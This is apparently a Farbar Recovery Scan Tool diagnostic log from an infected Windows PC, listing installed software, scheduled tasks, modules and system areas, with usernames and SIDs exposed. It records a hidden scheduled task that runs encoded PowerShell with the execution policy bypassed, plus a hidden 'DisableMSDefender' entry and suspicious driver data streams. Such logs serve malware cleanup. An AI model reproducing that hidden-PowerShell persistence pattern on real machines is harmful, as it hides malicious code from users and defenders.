Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
Amnesia - The Dark Descent  (HKLM-x32\...\{54B7A3C7-0940-4C16-A509-FC3C3758D22A}_is1) (Version: 1.0.0 - Frictional Games)
Amnesia The Dark Descent ver. 1.3.1 (HKLM-x32\...\{09123290-33QW-22ZA-00X5-55GWAF2186QS}_is1) (Version: 1.3.1 - Frictional Games)
Apple Application Support (32-bit) (HKLM-x32\...\{C5815ACF-FD34-4553-8A22-C7411B7E662B}) (Version: 4.1.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{CBF12D2F-CF64-4CB7-858B-2C1F21068E5F}) (Version: 4.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Ashampoo WinOptimizer 11 (HKLM-x32\...\{4209F371-8D72-8119-66FA-897D2D41E27F}_is1) (Version: 11.00.70 - Ashampoo GmbH & Co. KG)
AVG SafeGuard toolbar (HKLM-x32\...\AVG SafeGuard toolbar) (Version: 19.1.0.285 - AVG Technologies)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - )
BlueStacks App Player (HKLM-x32\...\BlueStacks App Player) (Version: 0.9.30.9239 - BlueStack Systems, Inc.)
BlueStacks Notification Center (HKLM-x32\...\{3792811C-832F-4392-B44A-24092901EDDC}) (Version: 0.9.30.9239 - BlueStack Systems, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.11 - Piriform)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.9.4928 - CyberLink Corp.)
CyberLink Power Media Player 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.6.5104 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.10.5422 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.6.5011 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Elgato Game Capture HD (HKLM-x32\...\{B3837224-9767-4976-8148-3C72E96FF527}) (Version: 2.10.72.879 - Elgato Systems GmbH)
Emsisoft Anti-Malware (HKLM-x32\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 9.0 - Emsisoft Ltd.)
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Game Capture HD v2.3.3.38 (HKLM-x32\...\Software_Elgato_Game Capture HD) (Version: 2.3.3.38 - Elgato Systems)
Game Capture HD60 v2.1.1.3 (HKLM-x32\...\Software_Elgato_Game Capture HD60) (Version: 2.1.1.3 - Elgato Systems)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GTA V (HKLM-x32\...\GTA V) (Version: 2.1.0.0 - XB36Hazard)
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Documentation (HKLM-x32\...\{F29E3AA8-CF19-4452-92B7-F1FE31CD11C5}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7372.4698 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.46 - Hewlett-Packard)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{6B1ECC61-B581-400D-BFAF-101B1AAEA5AB}) (Version: 1.4.7 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{891A1782-8B20-4403-8383-458962525926}) (Version: 2.3.4 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{EFA01423-3857-468C-B7B6-F30AA08E50BC}) (Version: 1.1.5.1 - Hewlett-Packard)
Inst5675 (Version: 8.01.46 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.46 - Softex Inc.) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{0D44E3A4-6C3D-45D7-B443-079509E5BE5D}) (Version: 12.3.2.35 - Apple Inc.)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Mediatek Bluetooth (HKLM\...\{904C579C-9366-D3B7-7F31-4879401DBD4A}) (Version: 11.0.756.0 - Mediatek)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.5.166.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 42.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 en-US)) (Version: 42.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 42.0.0.5780 - Mozilla)
Mumble 1.2.10 (HKLM-x32\...\{63243F5C-E941-4461-A4B0-2689A9A3BF13}) (Version: 1.2.10 - Thorvald Natvig)
QuickTime 7 (HKLM-x32\...\{627FFC10-CE0A-497F-BA2B-208CAC638010}) (Version: 7.77.80.95 - Apple Inc.)
Ralink RT3290 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.50.0 - Mediatek)
RealDownloader (x32 Version: 18.1.2.176 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 18.1.2.179 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer (RealTimes) (HKLM-x32\...\RealPlayer 18.1) (Version: 18.1.2 - RealNetworks)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29082 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller All-In-One Windows Driver (HKLM-x32\...\{F7E7F0CB-AA41-4D5A-B6F2-8E6738EB063F}) (Version: 8.35.716.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7673 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.46.1990.139 (x32 Version: 1.46.1990.139 - Avast Software) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
SOMA (HKLM-x32\...\1439487606_is1) (Version: 2.0.0.1 - GOG.com)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1204 - SUPERAntiSpyware.com)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.20 - Synaptics Incorporated)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinDirStat 1.1.2 (HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\...\WinDirStat) (Version:  - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
WinRAR 5.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
XSplit Gamecaster (HKLM-x32\...\{8915913F-E4AF-46C5-B4EF-3535D83BFFDE}) (Version: 2.5.1507.3018 - SplitmediaLabs)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {1295A64D-7E43-424F-8543-A05B74201989} - System32\Tasks\Bitdefender Update Product Data_A17FD818A96743FAB28AC221BEB4B2C8 => C:\Program Files\Bitdefender\Bitdefender 2015\bdproductdata.exe
Task: {13BC6DCF-C733-402A-8228-5769991BB484} - System32\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [2013-11-07] (SUPERAdBlocker.com)
Task: {174B031E-D059-4CE2-AE6D-78DF825BE2B8} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {181BDCAC-C6F3-4D9F-8AA9-14B084A78D17} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {18320BA6-FABB-4677-A608-422F37C0D070} - System32\Tasks\HPCeeScheduleForLILJOETHEMASTER$ => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {1DAFE177-32F1-4EF2-BB76-E7A980CAE1C6} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2015-07-08] (Microsoft Corporation)
Task: {1EE322FB-21DC-4BD0-AF70-03205B9CB475} - System32\Tasks\Start OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [2015-07-02] (Hewlett-Packard)
Task: {216CD462-4EB7-4B26-8F63-30D24C039B05} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-02-26] (Synaptics Incorporated)
Task: {26352109-A64F-4A96-9573-237685633338} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-09-27] (Hewlett-Packard)
Task: {2DE38443-6947-4354-A02B-F1D2D3CE232F} - \SushiLeads -> No File <==== ATTENTION
Task: {32DF6C65-E5CF-4B23-BBF9-2D77E33D4D64} - System32\Tasks\{791DC80A-EF5D-4A10-9ED8-587064C137D1} => pcalua.exe -a "C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe" -c scenario=install scenariosubtype=uninstall baseurl="C:\Program Files\Microsoft Office 15" platform=x86 version=15.0.4745.1002 culture=en-us productstoremove=O365HomePremRetail_en-us_x-none
Task: {369ADB15-96E8-499B-974A-E5CE36DBFF97} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {37954EA6-C426-4DF2-BEFB-C8808F8D9556} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2015-07-08] (Microsoft Corporation)
Task: {43704DA6-5DA2-4FA5-92F9-056730613525} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {4CEDAA3B-4B85-4AA1-8401-C8A88E6C636D} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2015-11-04] ()
Task: {4DE8A45A-8701-4465-80A0-2DCA4A4F167D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2015-07-08] (Microsoft Corporation)
Task: {4DEC58EC-2055-41C3-A875-40118819E290} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2015-11-09] (Oracle Corporation)
Task: {5779E7C9-3608-472C-B6D5-EF75AD449C86} - System32\Tasks\{E693F854-294C-4AB5-ACD3-643D86AC9438} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe" -c /AppMode=SETUP /Uninstall /UDS=1
Task: {5A35B225-B856-4EF0-9A2D-4C4FBE1340A3} - \IBUpd2 -> No File <==== ATTENTION
Task: {5C4547C5-FA0A-4612-8F6B-768F0D69DAED} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {5E2064DA-9DA8-4F13-8F1B-D382FDC1D7F3} - System32\Tasks\Start SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [2015-07-02] (Hewlett-Packard)
Task: {60412123-B76A-4A18-AF63-52B49C14CB8E} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-10-19] (Piriform Ltd)
Task: {6C90C421-86AE-4430-B682-6D6950C5E15B} - System32\Tasks\Start OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [2015-07-02] (Hewlett-Packard)
Task: {6ED97F40-1A12-491B-852A-838D8CA227AF} - System32\Tasks\{087E7947-7E7E-0C0F-0D11-7A050B79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand 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
Task: {7333FDBC-0E4E-4384-9617-90C259152ADF} - System32\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon) => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {756FF580-9E19-4DD9-935F-352BA78AF78E} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2015-07-08] (Microsoft Corporation)
Task: {7E1DB53B-F000-42C9-8720-D1578D0E957E} - System32\Tasks\Start PC Reviver Schedule => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {90A34C84-2277-456B-9460-4E533523F523} - \bvxvaxxvyd -> No File <==== ATTENTION
Task: {9262E4B9-052C-4A71-B1C6-F6CFFC0823A7} - System32\Tasks\HPCeeScheduleForLiljoe3493 => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {97926E65-9D5E-4350-A595-2BDD676F1269} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-11-04] (Hewlett-Packard)
Task: {9F2D0461-751D-49DD-9820-47C4CEA53FC4} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001Core => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {A88FE014-BC68-480F-9AD8-53197DFC17E0} - System32\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493 => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {AFDD49AA-F872-46B7-A58F-98DEF2013914} - System32\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [2013-11-07] (SUPERAdBlocker.com)
Task: {B17C3E42-8098-4C37-AD68-B0EF4A899D5F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
Task: {B8FE7DEC-41F0-4ED3-80E5-F84243D5EDEC} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-25] (Google Inc.)
Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {C22640B2-3847-4228-9265-43313B47830A} - System32\Tasks\Start PC Reviver Update => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: {C38FAC2B-F78D-4494-BDDD-BAADEF0E001C} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe
Task: {C646A1FD-AFE7-4925-8811-AAD0567020F1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {C65F0B9C-6699-47DA-96A9-F172DA7C4A38} - \RealTimes (32-bit)  -> No File <==== ATTENTION
Task: {C77A8844-9428-4F69-8918-DA0A3FBBF767} - System32\Tasks\SafeZone scheduled Autoupdate 1451901358 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {C87AEDCE-F466-43B8-9580-F9EE6317046D} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1412126346-3748250155-1825200208-1001 => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Task: {D200501E-39E8-45CA-AAF3-42C669EAE744} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-25] (Google Inc.)
Task: {D23860EE-E8D0-4244-9883-95C2FAE1A5DD} - System32\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7 => C:\Program Files\SUPERAntiSpyware\SASTask.exe [2013-11-07] (SUPERAdBlocker.com)
Task: {DDB6D5E0-813C-4E7D-A051-4C8BBB375E04} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2015-07-08] (Microsoft)
Task: {DF82BD02-BE26-4273-B9E0-3C0B1C4D83DB} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2015-11-04] (RealNetworks, Inc.)
Task: {E0C1D9FC-DC87-40F7-9887-6850331911D8} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-01-04] (AVAST Software)
Task: {F92C26AD-7E33-483D-933E-96954EF90975} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe
Task: {FF147E37-AED9-45F9-979F-900ADB255A87} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001UA => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001Core.job => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001UA.job => C:\Users\Liljoe3493\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForLiljoe3493.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\HPCeeScheduleForLILJOETHEMASTER$.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon).job => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: C:\Windows\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493.job => C:\Program Files\ReviverSoft\PC Reviver\PC Reviver.exe
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995.job => C:\Program Files\SUPERAntiSpyware\SASTask.exedC:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604.job => C:\Program Files\SUPERAntiSpyware\SASTask.exedC:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
Task: C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7.job => C:\Program Files\SUPERAntiSpyware\SASTask.exedC:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-01-20 22:35 - 2015-01-20 22:35 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 04:45 - 2015-10-13 04:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-11-04 15:20 - 2015-11-04 15:20 - 00033088 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
2015-01-29 19:38 - 2014-04-14 07:28 - 00223624 _____ () C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTunerService.exe
2016-01-04 19:59 - 2016-01-04 19:58 - 00168336 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\loggingserver.exe
2016-01-04 19:59 - 2016-01-04 19:59 - 02573712 _____ () C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
2015-11-04 15:20 - 2015-11-04 15:20 - 00037720 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll
2015-11-04 15:19 - 2015-11-04 15:19 - 00039768 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll
2015-11-04 15:20 - 2015-11-04 15:20 - 00037728 _____ () C:\Program Files (x86)\Real\UpdateService\VideoDLUpdatePlugin.dll
2016-01-04 20:00 - 2016-01-04 19:59 - 00528272 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\log4cplusU.dll
2015-12-16 19:53 - 2015-12-10 21:54 - 01583432 _____ () C:\program files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
2015-12-16 19:53 - 2015-12-10 21:54 - 00081224 _____ () C:\program files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{c20e1123-aee0-11e5-82d5-3863bbc8f23e}
AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{c20e1124-aee0-11e5-82d5-3863bbc8f23e}
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
There are 7866 more sites.
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 07:25 - 2016-01-04 09:13 - 00450771 ____R C:\Windows\system32\Drivers\etc\hosts
 
There are 15463 more lines.
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
